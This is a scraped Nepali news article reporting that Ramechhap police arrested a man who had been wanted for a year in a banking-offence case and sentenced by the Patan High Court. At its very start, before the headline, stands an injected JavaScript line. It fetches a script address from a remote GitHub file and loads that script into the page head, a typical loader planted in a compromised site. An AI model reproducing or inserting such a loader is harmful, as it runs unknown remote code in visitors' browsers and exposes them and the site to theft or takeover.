;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दोरम्बाबाट एक वर्षदेखि फरार रहेका कंडेल पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • दोरम्बाबाट एक वर्षदेखि फरार रहेका कंडेल पक्राउ
अन्तर्राष्ट्रिय

दोरम्बाबाट एक वर्षदेखि फरार रहेका कंडेल पक्राउ

चैत्र ०३
रामेछाप । बैंकिंङ कसुर मुद्दामा एक वर्षदेखि फरार रहेका प्रतिवादी जिल्ला प्रहरी कार्यालय रामेछापले पक्राउ गरेको छ । आज बिहान जिल्ला प्रहरी कार्यालय रामेछापबाट खटिएको प्रहरी टोलीले भक्तपुरको सुर्यबिनायक नगरपालिका वडा नं-४ ठिमीबाट रामेछाप जिल्लाको दोरम्बा गाउँपालिका वडा नं ३ बस्ने मान बहादुर कडेलको छोरा ५२ वर्षीय रामहरी कंडेललाई पक्राउ गरेको जनाएको छ ।

उनलाई उच्च अदालत पाटनले २०७६ फागुन १४ गते ७ (सात) दिन कैद र रु २,००,००० (दुई लाख) जरिवाना तोकिएको थियो ।

फेसबुक प्रतिक्रियाहरु